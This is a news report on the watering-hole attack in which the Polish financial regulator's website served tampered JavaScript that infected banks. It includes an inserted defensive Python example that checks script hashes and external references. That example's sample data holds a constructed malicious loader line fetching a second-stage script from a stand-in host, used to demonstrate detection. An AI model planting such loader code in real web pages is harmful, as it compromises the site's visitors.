A wide-ranging hack is already being dubbed the worst cyberattack on the Polish banking industry.
The sector's own financial regulator, the Polish Financial Supervision Authority (KNF), was ironically the original source of the compromise. The regulator's servers were hosting malicious files that were then infecting banks' systems.
A spokesman for the KNF told the Register that its internal systems had been compromised by someone "from another country," and that the KNF's entire system has been taken down "in order to secure evidence." So far, consumer bank balances have not been affected.
A number of banks found encrypted executables on several servers, according to BadCyber. The regulator's site was apparently serving a modified JavaScript file: visitors' browsers loaded an external file from it, which in turn pulled down the malicious payloads, a classic watering-hole pattern in which a trusted, widely visited site is used to reach its visitors. Many of the country's roughly 20 commercial banks reported being impacted.
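The injection described above succeeds only if nobody notices that a served script has changed. The following is an added example (not code from the article, BadCyber or the KNF) of the kind of baseline check a site operator or a bank's security team could run against JavaScript served by a site they depend on: compare the file's SHA-256 against a known-good digest and list any URL in it that points off the site's own host. The script contents, the `www.knf.gov.pl` host name and the `cdn.example.net` loader URL are all constructed for the example.

```python
import hashlib
import re
from urllib.parse import urlparse

# Constructed sample data (not from the real incident): a known-good copy of a
# site's script and a tampered copy with an appended loader that fetches a
# second-stage file from an external host.
KNOWN_GOOD_JS = "function init(){document.getElementById('hdr').textContent='KNF';}\n"
TAMPERED_JS = KNOWN_GOOD_JS + (
    "var s=document.createElement('script');"
    "s.src='https://cdn.example.net/lib/view.js';"
    "document.head.appendChild(s);\n"
)
OWN_HOST = "www.knf.gov.pl"  # assumption: the host whose script is being checked

# Matches absolute http(s) URLs embedded in script text.
URL_RE = re.compile(r"https?://[^\s'\"<>)]+")


def sha256_hex(data):
    """SHA-256 of the script text as a hex string (the stored baseline)."""
    return hashlib.sha256(data.encode("utf-8")).hexdigest()


def external_refs(js_text, own_host):
    """Return the distinct URLs in js_text whose host is not own_host."""
    refs = []
    for url in URL_RE.findall(js_text):
        host = urlparse(url).hostname or ""
        if host != own_host and url not in refs:
            refs.append(url)
    return refs


def check_script(js_text, baseline_hash, own_host):
    """Flag a script as modified if its digest differs from the baseline, and
    report every external host it would make the visitor's browser contact."""
    digest = sha256_hex(js_text)
    return {
        "modified": digest != baseline_hash,
        "sha256": digest,
        "external_refs": external_refs(js_text, own_host),
    }


if __name__ == "__main__":
    baseline = sha256_hex(KNOWN_GOOD_JS)
    for label, body in (("known-good", KNOWN_GOOD_JS), ("tampered", TAMPERED_JS)):
        result = check_script(body, baseline, OWN_HOST)
        print(label, "modified:", result["modified"],
              "external refs:", result["external_refs"])
```

Integrity checking of first-party scripts against a stored digest is the same idea Subresource Integrity applies to third-party ones; the value of the external-reference list is that it turns a bare "hash mismatch" into a triage lead, the host the injected code actually calls out to.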
David Jones, global head of payments and banking at Irdeto, told us via email that the attack is yet another example of creative cybercriminals leveraging diverse technologies to seed and propagate an attack across multiple banks.
"As banking systems become more connected or share common access points (such as a regulatory body), it is important to recognize that standard network protocols are inadequate to prevent advanced cyberattacks," he said. "Web apps/APIs and JavaScript can be tampered with, and their data intersected. This is due to the environment supported by modern browsers and the inherent lack of security in the open internet."
As a result, advanced security solutions should be considered for all apps/APIs that access and expose sensitive financial/private data, he added.
"Due to diversification of the cryptography, attackers are unable to weaponize attacks per user to impact a larger base," he noted. "In the case of the Polish banks attack, enhanced app/API security working in parallel with robust network infrastructure policies could have prevented a breach, whose damage is still to be understood and quantified fully."